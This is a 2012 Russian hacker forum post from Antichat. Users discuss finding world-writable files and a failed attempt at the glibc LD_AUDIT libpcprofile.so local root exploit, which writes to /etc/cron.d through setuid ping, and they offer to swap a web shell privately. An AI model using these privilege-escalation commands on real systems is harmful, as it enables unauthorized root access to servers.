13.01.2012, 11:55
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от SecondLife
Expl0ited
, а не подскажешь, почему команда
$ find / -perm -2 -ls
выводит огромный список файлов, которые, согласно выводу, доступны для записи? Например:
Код:
16007474 0 lrwxrwxrwx 1 root root 9 Jul 13 2011 /etc/php5/cgi/conf.d -> ../conf.d
16007473 0 lrwxrwxrwx 1 root root 9 Jul 12 2011 /etc/php5/apache2/conf.d -> ../conf.d
16007475 0 lrwxrwxrwx 1 root root 9 Jul 13 2011 /etc/php5/cli/conf.d -> ../conf.d
19513351 0 lrwxrwxrwx 1 root root 20 Jul 12 2011 /bin/nc -> /etc/alternatives/nc
19513347 0 lrwxrwxrwx 1 root root 6 Jul 12 2011 /bin/bzegrep -> bzgrep
19513354 0 lrwxrwxrwx 1 root root 4 Jul 12 2011 /bin/rbash -> bash
19513348 0 lrwxrwxrwx 1 root root 6 Jul 12 2011 /bin/bzfgrep -> bzgrep
19513353 0 lrwxrwxrwx 1 root root 16 Jul 12 2011 /bin/pidof -> ../sbin/killall5
19513346 0 lrwxrwxrwx 1 root root 6 Jul 12 2011 /bin/bzcmp -> bzdiff
19513356 0 lrwxrwxrwx 1 root root 4 Jul 12 2011 /bin/sh -> bash
19513355 0 lrwxrwxrwx 1 root root 4 Jul 12 2011 /bin/rnano -> nano
19513350 0 lrwxrwxrwx 1 root root 20 Jul 12 2011 /bin/mt -> /etc/alternatives/mt
19513349 0 lrwxrwxrwx 1 root root 6 Jul 12 2011 /bin/bzless -> bzmore
19513352 0 lrwxrwxrwx 1 root root 24 Jul 12 2011 /bin/netcat -> /etc/alternatives/netcat
22740995 0 lrwxrwxrwx 1 root root 7 Jul 12 2011 /sbin/ip -> /bin/ip
22741000 0 lrwxrwxrwx 1 root root 4 Jul 12 2011 /sbin/reboot -> halt
22741004 0 lrwxrwxrwx 1 root root 9 Jul 12 2011 /sbin/umount.nfs -> mount.nfs
22740999 0 lrwxrwxrwx 1 root root 7 Jul 13 2011 /sbin/quotaoff -> quotaon
22741002 0 lrwxrwxrwx 1 root root 4 Jul 12 2011 /sbin/telinit -> init
22741006 0 lrwxrwxrwx 1 root root 16 Jul 12 2011 /sbin/vol_id -> /lib/udev/vol_id
22741121 0 lrwxrwxrwx 1 root root 9 Sep 30 11:13 /sbin/dhclient -> dhclient3
22740996 0 lrwxrwxrwx 1 root root 10 Jul 12 2011 /sbin/lsmod -> /bin/lsmod
22740998 0 lrwxrwxrwx 1 root root 4 Jul 12 2011 /sbin/poweroff -> halt
22741003 0 lrwxrwxrwx 1 root root 7 Jul 12 2011 /sbin/udevsettle -> udevadm
22740997 0 lrwxrwxrwx 1 root root 9 Jul 12 2011 /sbin/mount.nfs4 -> mount.nfs
22741001 0 lrwxrwxrwx 1 root root 6 Jul 12 2011 /sbin/swapoff -> swapon
22741005 0 lrwxrwxrwx 1 root root 9 Jul 12 2011 /sbin/umount.nfs4 -> mount.nfs
в то время, как при просмотре через шелл отображается
Код:
Name: sh Size: 779.09 KB Permission: -rwxr-xr-x Owner/Group: root/root
Это симлинки
Сообщение от gl0w
sh-3.1$ umask 0
sh-3.1$ dpkg -S /lib/libpcprofile.so
libc6: /lib/libpcprofile.so
sh-3.1$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5400 Jan 17 2009 /lib/libpcprofile.so
sh-3.1$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
sh-3.1$ ls -l /etc/cron.d/exploit
ls: /etc/cron.d/exploit: No such file or directory
Так тоже не выходит, а компилировал в тот раз сам suid'ник :3
Дай шелл в личку, посмотрю.
|
|
|